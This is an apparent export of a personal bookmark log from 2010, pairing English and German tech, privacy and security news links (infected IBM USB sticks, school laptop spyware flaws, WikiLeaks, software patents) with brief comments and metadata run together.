+</p>http://www.heise.de/newsticker/meldung/Forscher-infiziert-sich-mit-Computervirus-1008216.htmlpage_shots/2010/06/07/heise-online-forscher-infiziert-sich.pngheise-online-forscher-infiziert-sich11012010-05-26 21:32:464rfid virusSchool's Laptop Spying Software Exploitable from AnywhereRemember the school laptops set up to allow staff to spy on the kids at home? It turns out that the spy software used, Absolute Manage, has hard-coded crypto keys. This means that if you hack one client, you've hacked them all.<p>Remember the school laptops set up to allow staff to spy on the kids at home? It turns out that the spy software used, Absolute Manage, has hard-coded crypto keys. This means that if you hack one client, you've hacked them all. +</p>http://www.freedom-to-tinker.com/blog/jhalderm/schools-laptop-spying-software-exploitable-anywherepage_shots/2010/05/25/schools-laptop-spying-software-exploitable-from-a.pngschools-laptop-spying-software-exploitable-from-a131012010-05-25 17:45:193IBM distributes malware-infested freebies at AusCERTRisky.Biz has confirmed IBM staff distributed malware-infected USB drives at the AusCERT security conference this week. + +In a highly embarrassing admission, the company has sent a broadcast e-mail to all AusCERT attendees warning them of the security lapse. + +"At the AusCERT conference this week, you may have collected a complimentary USB key from the IBM booth," the message reads. "Unfortunately we have discovered that some of these USB keys contained malware and we suspect that all USB keys may be affected." + +IBM is not the first company to distribute malware at AusCERT -- Australian telco Telstra did exactly the same thing in 2008.<p>Risky.Biz has confirmed IBM staff distributed malware-infected USB drives at the AusCERT security conference this week. +</p> +<p>In a highly embarrassing admission, the company has sent a broadcast e-mail to all AusCERT attendees warning them of the security lapse. +</p> +<p>"At the AusCERT conference this week, you may have collected a complimentary USB key from the IBM booth," the message reads. "Unfortunately we have discovered that some of these USB keys contained malware and we suspect that all USB keys may be affected." +</p> +<p>IBM is not the first company to distribute malware at AusCERT -- Australian telco Telstra did exactly the same thing in 2008. +</p>http://risky.biz/IBM-idiotspage_shots/2010/05/25/no_page_shot.pngibm-distributes-malware-infested-freebies-at-ausce131012010-05-25 13:54:473Ireland's largest ISP begins disconnecting users who are accused of piracyIreland is the first country in the world where a system of "graduated response" is being put in place. Under the pilot scheme, Eircom customers who illegally share copyrighted music will get three warnings before having their broadband service cut off for a year. +The Irish Recorded Music Association (Irma), whose members include EMI, Sony, Universal and Warner, reached an out-of-court settlement with Eircom in February 2009 under which the telecoms company agreed to introduce such a system for its 750,000 broadband users.<p>Ireland is the first country in the world where a system of "graduated response" is being put in place. Under the pilot scheme, Eircom customers who illegally share copyrighted music will get three warnings before having their broadband service cut off for a year. + The Irish Recorded Music Association (Irma), whose members include EMI, Sony, Universal and Warner, reached an out-of-court settlement with Eircom in February 2009 under which the telecoms company agreed to introduce such a system for its 750,000 broadband users. +</p>http://www.irishtimes.com/newspaper/frontpage/2010/0524/1224271013389.htmlpage_shots/2010/05/24/irelands-largest-isp-begins-disconnecting-users-w.pngirelands-largest-isp-begins-disconnecting-users-w131012010-05-24 14:45:503DARPA trying to beat block lists, deep packet inspection • The RegisterThe latest DARPA scheme is called Safer Warfighter Communications (SAFER), which sounds suitably martial. But what it is actually meant to do is "bypass techniques that suppress, localize, and/or corrupt information". Specifically, the SAFER technology will be able to bypass: + +Internet Protocol (IP) address filtering or “blocking,” typically by blacklisting the IP addresses of websites or other services, possibly by the network operator, to deny the user access. +And also: + +Content filtering that captures and analyzes the content of the user’s network traffic through deep packet inspection to check whether the traffic contains predefined signatures or sensitive keywords.<p>The latest DARPA scheme is called Safer Warfighter Communications (SAFER), which sounds suitably martial. But what it is actually meant to do is "bypass techniques that suppress, localize, and/or corrupt information". Specifically, the SAFER technology will be able to bypass: +</p> +<p>Internet Protocol (IP) address filtering or “blocking,” typically by blacklisting the IP addresses of websites or other services, possibly by the network operator, to deny the user access. + And also: +</p> +<p>Content filtering that captures and analyzes the content of the user’s network traffic through deep packet inspection to check whether the traffic contains predefined signatures or sensitive keywords. +</p>http://www.theregister.co.uk/2010/05/21/darpa_vs_block_lists_dpi/page_shots/2010/05/22/darpa-trying-to-beat-block-lists-deep-packet-insp.pngdarpa-trying-to-beat-block-lists-deep-packet-insp11012010-05-22 00:52:293Encrypted Google search coming to a browser near youhttp*S*://www.google.com in Beta<p>http<em>S</em>://www.google.com in Beta +</p>http://arstechnica.com/web/news/2010/05/encrypted-google-search-coming-to-a-browser-near-you.arspage_shots/2010/05/22/encrypted-google-search-coming-to-a-browser-near-y.pngencrypted-google-search-coming-to-a-browser-near-y11012010-05-22 00:09:233Fraud Bazaar Carders.cc Hacked &mdash; Krebs on SecurityEinbruch auf illegaler Account-Trader Seite. Grund: Schlecht administrierter Web-Server. + +An online forum where criminals trade stolen financial account information has been attacked and information stolen. At least three files now being traded on a public site contain information stolen from +Carders.cc, the German underground forum, including communications between members. Ironically, a poorly configured server allowed the attackers to steal information from the group's database. The culprits +appear to be members of a group that says it wants to expose the forum's illegal activity. +<p>Einbruch auf illegaler Account-Trader Seite. Grund: Schlecht administrierter Web-Server. +</p> +<p>An online forum where criminals trade stolen financial account information has been attacked and information stolen. At least three files now being traded on a public site contain information stolen from + Carders.cc, the German underground forum, including communications between members. Ironically, a poorly configured server allowed the attackers to steal information from the group's database. The culprits + appear to be members of a group that says it wants to expose the forum's illegal activity. +</p>http://krebsonsecurity.com/2010/05/fraud-bazaar-carders-cc-hacked/page_shots/2010/05/21/fraud-bazaar-carderscc-hacked-mdash-krebs-on-s.pngfraud-bazaar-carderscc-hacked-mdash-krebs-on-s11012010-05-21 23:16:023Report: Facebook caught sharing secret data with advertisersFacebook, MySpace, Digg etc. sold user data to advertisers. Biz model at work.<p>Facebook, MySpace, Digg etc. sold user data to advertisers. Biz model at work. +</p>http://arstechnica.com/tech-policy/news/2010/05/latest-facebook-blunder-secret-data-sharing-with-advertisers.arspage_shots/2010/05/21/report-facebook-caught-sharing-secret-data-with-a.pngreport-facebook-caught-sharing-secret-data-with-a11012010-05-21 22:52:133Empire Strikes 30: Ars looks back at an amazing filmAlso see the pacman anniversary<p>Also see the pacman anniversary +</p>http://arstechnica.com/media/news/2010/05/empire-strikes-30-ars-looks-back-at-an-amazing-film.arspage_shots/2010/05/21/empire-strikes-30-ars-looks-back-at-an-amazing-fi.pngempire-strikes-30-ars-looks-back-at-an-amazing-fi11012010-05-21 22:45:243Pac-Man is 30! Celebrate along with... Google? 30 years of addiction<p>30 years of addiction +</p>http://arstechnica.com/gaming/news/2010/05/pac-man-is-30-celebrate-along-with-google.arspage_shots/2010/05/21/pac-man-is-30-celebrate-along-with-google.pngpac-man-is-30-celebrate-along-with-google11012010-05-21 22:42:333heise online - IBM verteilt auf Sicherheitskonferenz infizierte USB-SticksThe [warning mail](http://beastorbuddha.com/2010/05/21/ibm-letter-to-auscert-delegates-free-malware-giveaway/)<p>The <a href="http://beastorbuddha.com/2010/05/21/ibm-letter-to-auscert-delegates-free-malware-giveaway/">warning mail</a> +</p>http://www.heise.de/newsticker/meldung/IBM-verteilt-auf-Sicherheitskonferenz-infizierte-USB-Sticks-1005425.htmlpage_shots/2010/05/21/heise-online-ibm-verteilt-auf-sicherheitskonfere.pngheise-online-ibm-verteilt-auf-sicherheitskonfere11012010-05-21 14:38:343Clegg vows to restore British privacy - V3.co.uk - formerly vnunet.comNew Britisch Government will make it's promise to give privacy back to people true.<p>New Britisch Government will make it's promise to give privacy back to people true. +</p>http://www.v3.co.uk/v3/news/2263368/clegg-promises-restore-britishpage_shots/2010/05/21/clegg-vows-to-restore-british-privacy-v3couk.pngclegg-vows-to-restore-british-privacy-v3couk11012010-05-21 10:06:213Most browsers silently expose intimate viewing habits • The RegisterBrowser history attack optimised<p>Browser history attack optimised +</p>http://www.theregister.co.uk/2010/05/20/browser_history_attack/page_shots/2010/05/21/most-browsers-silently-expose-intimate-viewing-hab.pngmost-browsers-silently-expose-intimate-viewing-hab11012010-05-21 10:03:093School Spy Program Used on Students Contains Hacker-Friendly Security Hole | Threat Level | Wired.comhttp://www.wired.com/threatlevel/2010/05/lanrevpage_shots/2010/05/21/school-spy-program-used-on-students-contains-hacke.pngschool-spy-program-used-on-students-contains-hacke11012010-05-21 10:01:313Humanistische Union: Publikationen: Grundrechte-Report: Ausgaben: Archiv: GRR 2010 +Ein Projekt der Humanistischen Union, der Gustav Heinemann-Initiative, des Komitees für Grundrechte und Demokratie, des Bundesarbeitskreises Kritischer Juragruppen, von Pro Asyl, des Republikanischen Anwältinnen- und Anwältevereins, der Vereinigung demokratischer Juristinnen und Juristen, der Internationalen Liga für Menschenrechte und der Neuen Richtervereinigung.<p>Ein Projekt der Humanistischen Union, der Gustav Heinemann-Initiative, des Komitees für Grundrechte und Demokratie, des Bundesarbeitskreises Kritischer Juragruppen, von Pro Asyl, des Republikanischen Anwältinnen- und Anwältevereins, der Vereinigung demokratischer Juristinnen und Juristen, der Internationalen Liga für Menschenrechte und der Neuen Richtervereinigung. +</p>http://www.humanistische-union.de/publikationen/grundrechte_report/ausgaben/archiv/2010/page_shots/2010/05/20/humanistische-union-publikationen-grundrechte-re.pnghumanistische-union-publikationen-grundrechte-re11012010-05-20 23:54:273heise online - Frequenzauktion bringt 4,4 Milliarden EuroEtwas auf dem komplett asozialen Prinzip der Frequenzaufteilung rumhacken. Eigentlich sollten nur noch dynamic, frequency selection and multicarrier scheduling scheme eingesetzt werden, wie z. B. bei WLAN. Da können alle funken und gucken halt vor dem Senden, ob die Frequenz frei ist. Damit bekommt man wesentlich mehr Daten durch die Luft. Gerade um die 800 MHz Frequenzen ist es schade. + +So ist das, als ob nur die Busse eines Unternehmens für die Straßen zugelassen werden. Das Unternehmen bestimmt den Preis für die Nutzung.<p>Etwas auf dem komplett asozialen Prinzip der Frequenzaufteilung rumhacken. Eigentlich sollten nur noch dynamic, frequency selection and multicarrier scheduling scheme eingesetzt werden, wie z. B. bei WLAN. Da können alle funken und gucken halt vor dem Senden, ob die Frequenz frei ist. Damit bekommt man wesentlich mehr Daten durch die Luft. Gerade um die 800 MHz Frequenzen ist es schade. +</p> +<p>So ist das, als ob nur die Busse eines Unternehmens für die Straßen zugelassen werden. Das Unternehmen bestimmt den Preis für die Nutzung. +</p>http://www.heise.de/newsticker/meldung/Frequenzauktion-bringt-4-4-Milliarden-Euro-1004771.htmlpage_shots/2010/05/20/heise-online-frequenzauktion-bringt-44-milliard.pngheise-online-frequenzauktion-bringt-44-milliard11012010-05-20 23:49:033A Piece of Internet HistoryDuke to shut Usenet server, home to the first electronic newsgroups. + +On May 20, Duke will shut down its Usenet server, which provides access to a worldwide electronic discussion network of newsgroups started in 1979 by two Duke graduate students, Tom Truscott and Jim Ellis.<p>Duke to shut Usenet server, home to the first electronic newsgroups. +</p> +<p>On May 20, Duke will shut down its Usenet server, which provides access to a worldwide electronic discussion network of newsgroups started in 1979 by two Duke graduate students, Tom Truscott and Jim Ellis. +</p>http://www.dukenews.duke.edu/2010/05/usenet.htmlpage_shots/2010/05/20/a-piece-of-internet-history.pnga-piece-of-internet-history11012010-05-20 23:39:383RIA Novosti - Politik - International - Erfinder des ersten Geldautomaten ist totErfinder des ersten Geldautomaten John Shepherd-Barron ist im Alter von 84 Jahren in Großbritannien gestorben. + +Wir der Erfinder sich 2007 in einem Interview erinnerte, ist er auf die Idee mit dem Bankautomaten gekommen, nachdem ihm bei einer Bank gekündigt worden war. + +„Es musste einen Weg geben, wie ich an mein Geld kommen konnte, überall in der Welt oder in Großbritannien“, sagte er damals. + +Der erste Geldautomat wurde dann 1967 in einer Bank in London aufgestellt. Lediglich zehn britische Pfund konnten damals gezogen werden. Anfänglich wurden Schecks mit einer Codenummer für die Geldausgabe benutzt. Diese Schecks wurden zuvor in der Bank ausgegeben.<p>Erfinder des ersten Geldautomaten John Shepherd-Barron ist im Alter von 84 Jahren in Großbritannien gestorben. +</p> +<p>Wir der Erfinder sich 2007 in einem Interview erinnerte, ist er auf die Idee mit dem Bankautomaten gekommen, nachdem ihm bei einer Bank gekündigt worden war. +</p> +<p>„Es musste einen Weg geben, wie ich an mein Geld kommen konnte, überall in der Welt oder in Großbritannien“, sagte er damals. +</p> +<p>Der erste Geldautomat wurde dann 1967 in einer Bank in London aufgestellt. Lediglich zehn britische Pfund konnten damals gezogen werden. Anfänglich wurden Schecks mit einer Codenummer für die Geldausgabe benutzt. Diese Schecks wurden zuvor in der Bank ausgegeben. +</p>http://de.rian.ru/world/20100520/126379573.htmlpage_shots/2010/05/20/ria-novosti-politik-international-erfinder-d.pngria-novosti-politik-international-erfinder-d11012010-05-20 23:17:323VP8 / WebM von Google veröffentlichtGood News, große Zahl von Supportern (IE, Chrome, Firefox, Opera) plus lange Liste von Firmen<p>Good News, große Zahl von Supportern (IE, Chrome, Firefox, Opera) plus lange Liste von Firmen +</p>http://webmproject.blogspot.com/2010/05/introducing-webm-open-web-media-project.htmlpage_shots/2010/05/20/vp8-webm-von-google-veroffentlicht.pngvp8-webm-von-google-veroffentlicht11012010-05-20 15:44:303Softwarepatent durch BGH bestätigt * After a landmark court ruling, the German perspective on the validity of software patents is now closer than ever to that of the US. + * Basically, Germany has now had its own Bilski case -- with the worst possible outcome for the opponents of software patents. + * Recently, the Enlarged Board of Appeal of the European Patent Office upheld that approach to software patents as well, effectively accepting that a computer program stored on a medium must be patentable in principle. + * Defense strategies such as the Defensive Patent License are needed now more than ever. + +Inhalt: +A client-server software for the automatic generation of structured documents (such as XML or HTML) is an example of a patentable software invention.<pre><code>* After a landmark court ruling, the German perspective on the validity of software patents is now closer than ever to that of the US. +* Basically, Germany has now had its own Bilski case -- with the worst possible outcome for the opponents of software patents. +* Recently, the Enlarged Board of Appeal of the European Patent Office upheld that approach to software patents as well, effectively accepting that a computer program stored on a medium must be patentable in principle. +* Defense strategies such as the Defensive Patent License are needed now more than ever. +</code></pre><p>Inhalt: + A client-server software for the automatic generation of structured documents (such as XML or HTML) is an example of a patentable software invention. +</p>http://fosspatents.blogspot.com/2010/05/german-high-court-declares-all-software.htmlpage_shots/2010/05/20/softwarepatent-durch-bgh-bestatigt_.pngsoftwarepatent-durch-bgh-bestatigt11012010-05-20 15:37:463OpenBSD 4.7 releasedOpenBSD 4.7 mit neuen Treibern und Plattformen released. + +*Krass, OpenBSD gibt es ja immer noch. *<p>OpenBSD 4.7 mit neuen Treibern und Plattformen released. +</p> +<p><em>Krass, OpenBSD gibt es ja immer noch. </em> +</p>http://www.openbsd.org/47.htmlpage_shots/2010/05/20/openbsd-47-released.pngopenbsd-47-released11012010-05-20 15:31:543Example for on-line activismGreenpeace net-action against palm oil usage of Nestle was a big success.<p>Greenpeace net-action against palm oil usage of Nestle was a big success. +</p>http://australianetworknews.com/story.htm?id=29302page_shots/2010/05/19/no_page_shot.pngexample-for-on-line-activism11012010-05-19 16:40:303Wikileaks is backFinally :-) Still support it. + +[Julians Pass einkassiert, wiedergegeben um ihn demnächst zu canceln](http://www.theage.com.au/technology/technology-news/australian-wikileak-founders-passport-confiscated-20100516-v6dw.html)<p>Finally :-) Still support it. +</p> +<p><a href="http://www.theage.com.au/technology/technology-news/australian-wikileak-founders-passport-confiscated-20100516-v6dw.html">Julians Pass einkassiert, wiedergegeben um ihn demnächst zu canceln</a> +</p>http://wikileaks.org/wiki/Wikileakspage_shots/2010/05/19/wikileaks-is-back_.pngwikileaks-is-back11012010-05-19 14:32:123Youtube streamt über zwei Milliarden Videoclips pro Tag, 5 Jahre alt5 Jahre Youtube, 2 Mrd Filme pro Tag gestreamt<p>5 Jahre Youtube, 2 Mrd Filme pro Tag gestreamt +</p>http://www.heise.de/newsticker/meldung/Youtube-streamt-ueber-zwei-Milliarden-Videoclips-pro-Tag-1001922.htmlpage_shots/2010/05/18/heise-online-youtube-streamt-uber-zwei-milliarde__.pngheise-online-youtube-streamt-uber-zwei-milliarde11012010-05-18 22:57:103youtubeCCC | Prix Ars Electronica 2010http://www.ccc.de/de/updates/2010/prix-ars-electronica-2010page_shots/2010/05/17/ccc-prix-ars-electronica-2010.pngccc-prix-ars-electronica-201011012010-05-17 23:29:103arselectronica cccUS military chokes on stream from robots' fat pipes • The RegisterLt Gen Deptula, USAF deputy chief of staff for intelligence, surveillance and reconnaissance, told Defence Industry Daily: “We are going to find ourselves in the not too distant future swimming in sensors and drowning in data.” In 2009 US drones recorded _24 years of video footage_ - newer drones are expected to increase this by a factor of 30 by 2011. + +Another solution being examined by the Navy is "data fusion" - adding geographical information to existing video footage to make it more usable<p>Lt Gen Deptula, USAF deputy chief of staff for intelligence, surveillance and reconnaissance, told Defence Industry Daily: “We are going to find ourselves in the not too distant future swimming in sensors and drowning in data.” In 2009 US drones recorded <em>24 years of video footage</em> - newer drones are expected to increase this by a factor of 30 by 2011. +</p> +<p>Another solution being examined by the Navy is "data fusion" - adding geographical information to existing video footage to make it more usable +</p>http://www.theregister.co.uk/2010/05/17/us_army_drones_info_overload/page_shots/2010/05/17/us-military-chokes-on-stream-from-robots-fat-pipe_.pngus-military-chokes-on-stream-from-robots-fat-pipe11012010-05-17 23:13:583drone + Infosecurity (UK) - Facebook identifies hacker selling 1.5 million accounts +Reports are coming in that Facebook has identified the self-proclaimed hacker who was offering to sell batches of 1000 Facebook accounts - up to 1.5 million in total - and it appears that the Russian hacker was wildly overstating the account numbers. + +McMillan says that Kirllos had been selling batches of 1000 accounts at between $25 and $45 a batch.<p>Reports are coming in that Facebook has identified the self-proclaimed hacker who was offering to sell batches of 1000 Facebook accounts - up to 1.5 million in total - and it appears that the Russian hacker was wildly overstating the account numbers. +</p> +<p>McMillan says that Kirllos had been selling batches of 1000 accounts at between $25 and $45 a batch. +</p>http://www.infosecurity-magazine.com/view/9478/facebook-identifies-hacker-selling-15-million-accounts/page_shots/2010/05/17/infosecurity-uk-facebook-identifies-hacker.pnginfosecurity-uk-facebook-identifies-hacker11012010-05-17 21:38:433accounts facebookGoogle Street View logs WiFi networks, Mac addresses • The Registersiehe auch WLAN Urteil<p>siehe auch WLAN Urteil +</p>http://www.theregister.co.uk/2010/04/22/google_streetview_logs_wlans/page_shots/2010/05/17/google-street-view-logs-wifi-networks-mac-address.pnggoogle-street-view-logs-wifi-networks-mac-address11012010-05-17 17:36:323google streetview wlanGoogle abandons smart phone Web store - The Globe and MailThe titel says it all.<p>The titel says it all. +</p>http://www.theglobeandmail.com/news/technology/google-abandons-smart-phone-web-store/article1569217/page_shots/2010/05/17/google-abandons-smart-phone-web-store-the-globe.pnggoogle-abandons-smart-phone-web-store-the-globe11012010-05-17 17:34:133android google phone Wikileaks founder told his passport will be cancelled | TG DailyAccording to The Age, Assange had his passport taken away on his arrival at Melbourne airport last week. While it was returned 15 minutes later, Assange said he was told it would be cancelled. + +Assange said that shortly after his passport was returned he was questioned about a hacking offence committed when he was a teenager. + +Assange told the television program Dateline that Australia is one of several countries where he feels unsafe. + +"There are places… Dubai, who is trying to have us arrested, Switzerland under the bank secrecy laws, Cayman Islands," he said. "Australia had the federal police in relation to its censorship list so there are some jurisdictions that from time to time it wouldn’t be sensible to go there."<p>According to The Age, Assange had his passport taken away on his arrival at Melbourne airport last week. While it was returned 15 minutes later, Assange said he was told it would be cancelled. +</p> +<p>Assange said that shortly after his passport was returned he was questioned about a hacking offence committed when he was a teenager. +</p> +<p>Assange told the television program Dateline that Australia is one of several countries where he feels unsafe. +</p> +<p>"There are places… Dubai, who is trying to have us arrested, Switzerland under the bank secrecy laws, Cayman Islands," he said. "Australia had the federal police in relation to its censorship list so there are some jurisdictions that from time to time it wouldn’t be sensible to go there." +</p>http://www.tgdaily.com/business-and-law-features/49782-wikileaks-founder-told-his-passport-will-be-cancelledpage_shots/2010/05/17/wikileaks-founder-told-his-passport-will-be-cance.pngwikileaks-founder-told-his-passport-will-be-cance11012010-05-17 17:31:343wikileaksPirate Bay ISP hit with German injunction; must stop hostingThe district court in Hamburg, Germany has issued an injunction against Cyberbunker and its owner, Sven Olaf Kamphuis, demanding that he cut off service to The Pirate Bay.<p>The district court in Hamburg, Germany has issued an injunction against Cyberbunker and its owner, Sven Olaf Kamphuis, demanding that he cut off service to The Pirate Bay. +</p>http://arstechnica.com/tech-policy/news/2010/05/pirate-bay-isp-hit-with-german-injunction-must-stop-hosting.arspage_shots/2010/05/13/pirate-bay-isp-hit-with-german-injunction-must-st.pngpirate-bay-isp-hit-with-german-injunction-must-st11012010-05-13 22:10:143cyberbunker isp piratebayGigapan: Das größte Foto der Welt hat 45 GigapixelDreieinhalb Stunden musste der US-Fotograf Gerald Donovan in luftiger Höhe ausharren, dann war das derzeit größte Foto der Welt fertig. Es zeigt ein Panorama der Stadt Dubai. Die 4.250 Einzelbilder hat eine Maschine geknipst.<p>Dreieinhalb Stunden musste der US-Fotograf Gerald Donovan in luftiger Höhe ausharren, dann war das derzeit größte Foto der Welt fertig. Es zeigt ein Panorama der Stadt Dubai. Die 4.250 Einzelbilder hat eine Maschine geknipst. +</p>http://www.golem.de/1005/75067.htmlpage_shots/2010/05/12/gigapan-das-groumlszligte-foto-der-welt-hat-4_.pnggigapan-das-groumlszligte-foto-der-welt-hat-411012010-05-12 23:27:173picture pixelDenic: Probleme mit den .de-Rootservern?DeNIC antwortet mal mit einer Runde NXDOMAIN auf Anfragen und macht so das .de Internet kaputt. +Grund: fehlerhafte Aktualisierung der Nameserverdaten + +Nach Auskunft von DeNIC war dieser regelmäßige 2-stündige Kopiervorgang, bei dem die aus der Registrierungsdatenbank erzeugte Zonendatei übertragen wird, nach etwa einem Drittel der Datensätze abgebrochen worden.<p>DeNIC antwortet mal mit einer Runde NXDOMAIN auf Anfragen und macht so das .de Internet kaputt. + Grund: fehlerhafte Aktualisierung der Nameserverdaten +</p> +<p>Nach Auskunft von DeNIC war dieser regelmäßige 2-stündige Kopiervorgang, bei dem die aus der Registrierungsdatenbank erzeugte Zonendatei übertragen wird, nach etwa einem Drittel der Datensätze abgebrochen worden. +</p>http://www.golem.de/1005/75090.htmlpage_shots/2010/05/17/denic-probleme-mit-den-de-rootservern-update-2.pngdenic-probleme-mit-den-de-rootservern-update-211012010-05-12 23:24:283denic dnsAir Force suffers collateral damage from PS3 firmware updateThe Air Force Research Laboratory in Rome, New York picked up 336 PS3 systems in 2009 and built itself a 53 teraFLOP processing cluster. Once completed as a proof of concept, Air Force researchers then scaled up by a factor of six and went in search of 2,200 more consoles (later scaled back to 1,700). The $663,000 contract was awarded on January 6, 2010, to a small company called Fixstars that could provide 1,700 160GB PS3 systems to the government. + +Now it doesn't run anymore!<p>The Air Force Research Laboratory in Rome, New York picked up 336 PS3 systems in 2009 and built itself a 53 teraFLOP processing cluster. Once completed as a proof of concept, Air Force researchers then scaled up by a factor of six and went in search of 2,200 more consoles (later scaled back to 1,700). The $663,000 contract was awarded on January 6, 2010, to a small company called Fixstars that could provide 1,700 160GB PS3 systems to the government. +</p> +<p>Now it doesn't run anymore! +</p>http://arstechnica.com/gaming/news/2010/05/how-removing-ps3-linux-hurts-the-air-force.arspage_shots/2010/05/12/air-force-suffers-collateral-damage-from-ps3-firmw_.pngair-force-suffers-collateral-damage-from-ps3-firmw11012010-05-12 14:13:273airforce otheros ps3 sonyHartz IV: Kein Geld für Computer | tagesschau.deHarz iv Leute brauchen keine Computer<p>Harz iv Leute brauchen keine Computer +</p>http://www.tagesschau.de/inland/hartzcomputer100.htmlpage_shots/2010/05/12/hartz-iv-kein-geld-fur-computer-tagesschaude.pnghartz-iv-kein-geld-fur-computer-tagesschaude11012010-05-12 12:00:163harzivheise online - BGH schränkt Folgen der Störerhaftung für WLAN-Betreiber einBesonders bitter dürfte den Urheberrechts-Massenabmahnern ein Hinweis des BGH bezüglich der Höhe der Abmahngebühren aufstoßen. Der für Urheberrechtssachen zuständige 1. Senat des höchsten Gerichts merkte an, dass es seit 2008 den Absatz 2 des Paragrafen 97a Urheberechtsgesetz (UrhG) gibt. Dieser sieht eine Höchstgrenze von 100 Euro für Urheberrechtsabmahnungen dann vor, wenn es sich um "einfach gelagerte Fällen mit einer nur unerheblichen Rechtsverletzung außerhalb des geschäftlichen Verkehrs" handelt.<p>Besonders bitter dürfte den Urheberrechts-Massenabmahnern ein Hinweis des BGH bezüglich der Höhe der Abmahngebühren aufstoßen. Der für Urheberrechtssachen zuständige 1. Senat des höchsten Gerichts merkte an, dass es seit 2008 den Absatz 2 des Paragrafen 97a Urheberechtsgesetz (UrhG) gibt. Dieser sieht eine Höchstgrenze von 100 Euro für Urheberrechtsabmahnungen dann vor, wenn es sich um "einfach gelagerte Fällen mit einer nur unerheblichen Rechtsverletzung außerhalb des geschäftlichen Verkehrs" handelt. +</p>http://www.heise.de/newsticker/meldung/BGH-schraenkt-Folgen-der-Stoererhaftung-fuer-WLAN-Betreiber-ein-998591.htmlpage_shots/2010/05/12/heise-online-bgh-schrankt-folgen-der-storerhaftu.pngheise-online-bgh-schrankt-folgen-der-storerhaftu11012010-05-12 10:39:423bgh filesharing wlanAdobe's new Flash DRM comes with selective output controlWas Flash echt noch gefehlt hat: _DRM_<p>Was Flash echt noch gefehlt hat: <em>DRM</em> +</p>http://arstechnica.com/media/news/2010/05/adobes-new-flash-drm-comes-with-selective-output-control.arspage_shots/2010/05/12/adobes-new-flash-drm-comes-with-selective-output.pngadobes-new-flash-drm-comes-with-selective-output11012010-05-12 10:31:263adobe drm flashThe Humble Indie Bundle (pay what you want for five awesome indie games)Humble Bundle gets > $ 1 mio + +Win user average $8 +Mac user average $10 +Linux user average $14.5<p>Humble Bundle gets &gt; $ 1 mio +</p> +<p>Win user average $8 + Mac user average $10 + Linux user average $14.5 +</p>http://www.wolfire.com/humblepage_shots/2010/05/12/the-humble-indie-bundle-pay-what-you-want-for-fiv.pngthe-humble-indie-bundle-pay-what-you-want-for-fiv11012010-05-12 10:22:333gamesAmazon Spying On Your Ebook Highlighting | Techdirt Amazon will now [remotely upload and store the user notes and highlights](http://redtape.msnbc.com/2010/05/as-the-battle-of-e-book-readers-heats-up-amazon-is-trying-to-beat-the-competition-by-continually-adding-new-features-to-its.html#posts) you take on your Kindle, which it then compiles into "popular highlights." <p> Amazon will now <a href="http://redtape.msnbc.com/2010/05/as-the-battle-of-e-book-readers-heats-up-amazon-is-trying-to-beat-the-competition-by-continually-adding-new-features-to-its.html#posts">remotely upload and store the user notes and highlights</a> you take on your Kindle, which it then compiles into "popular highlights." +</p>http://techdirt.com/articles/20100511/1018059377.shtmlpage_shots/2010/05/12/amazon-spying-on-your-ebook-highlighting-techdir.pngamazon-spying-on-your-ebook-highlighting-techdir11012010-05-12 10:17:323amazon kindlePrivacy watchdog looks into NHS data breach | Security Threats | ZDNet UKloss of a data stick containing information on psychiatric patients in Scotland on a memory stick. Typ gefeuert. + +Deputy information commissioner David Smith told the Infosecurity Europe 2010 conference last week that the NHS was the biggest single UK organisation that loses data. *Since November 2007, 287 out of 962 serious data loss incidents have been by the NHS.*<p>loss of a data stick containing information on psychiatric patients in Scotland on a memory stick. Typ gefeuert. +</p> +<p>Deputy information commissioner David Smith told the Infosecurity Europe 2010 conference last week that the NHS was the biggest single UK organisation that loses data. <em>Since November 2007, 287 out of 962 serious data loss incidents have been by the NHS.</em> +</p>http://www.zdnet.co.uk/news/security-threats/2010/05/06/privacy-watchdog-looks-into-nhs-data-breach-40088863/page_shots/2010/05/12/privacy-watchdog-looks-into-nhs-data-breach-sec001.pngprivacy-watchdog-looks-into-nhs-data-breach-sec00111012010-05-12 10:10:473dataloss uk 'Zombie' satellite runs amok in Earth's orbit - CSMonitor.com + Galaxy 15, geo-stationary sat out-of-control after solar flare.<p>Galaxy 15, geo-stationary sat out-of-control after solar flare. +</p>http://www.csmonitor.com/Science/2010/0509/Zombie-satellite-runs-amok-in-Earth-s-orbitpage_shots/2010/05/11/zombie-satellite-runs-amok-in-earths-or.pngzombie-satellite-runs-amok-in-earths-or11012010-05-11 10:33:583zombiesat7Gbps WiFi Wireless Networking Hardware Could Launch in 2010 &minus; ISPreview UK@ 60GHz <p>@ 60GHz +</p>http://www.ispreview.co.uk/story/2010/05/10/7gbps-wifi-wireless-networking-hardware-could-launch-in-2010.htmlpage_shots/2010/05/11/7gbps-wifi-wireless-networking-hardware-could-laun.png7gbps-wifi-wireless-networking-hardware-could-laun11012010-05-11 10:30:203wlanTwitter confirms awkward 'auto-follow' bug | The Social - CNET NewsIt's been a Monday of social-media security embarrassments: Twitter has confirmed the existence of a bug that can force one user to follow another.<p>It's been a Monday of social-media security embarrassments: Twitter has confirmed the existence of a bug that can force one user to follow another. +</p>http://news.cnet.com/8301-13577_3-20004563-36.htmlpage_shots/2010/05/11/twitter-confirms-awkward-auto-follow-bug-the-s.pngtwitter-confirms-awkward-auto-follow-bug-the-s11012010-05-11 10:27:563twitterheise online - Fremde MobileMails bei Vodafone einsehbarVodafone läßt Mobilnutzer mal in die Mailbox anderer Kunden gucken.<p>Vodafone läßt Mobilnutzer mal in die Mailbox anderer Kunden gucken. +</p>http://www.heise.de/newsticker/meldung/Fremde-MobileMails-bei-Vodafone-einsehbar-995531.htmlpage_shots/2010/05/11/heise-online-fremde-mobilemails-bei-vodafone-ein.pngheise-online-fremde-mobilemails-bei-vodafone-ein11012010-05-11 10:22:453dataloss vodafoneheise online - Hohes Bußgeld gegen Postbank in Finanzberater-Affäre120k € für "Postbank gibt Kontobewegungen an Vermarkter" raus.<p>120k € für "Postbank gibt Kontobewegungen an Vermarkter" raus. +</p>http://www.heise.de/newsticker/meldung/Hohes-Bussgeld-gegen-Postbank-in-Finanzberater-Affaere-996142.htmlpage_shots/2010/05/11/heise-online-hohes-bugeld-gegen-postbank-in-fin.pngheise-online-hohes-bugeld-gegen-postbank-in-fin11012010-05-11 10:21:033dataloss postbankWordPress Hacked with Zettapetta on DreamHost | WPSecurityLockWordpress and potential other php applications mass hack. Malware distributed<p>Wordpress and potential other php applications mass hack. Malware distributed 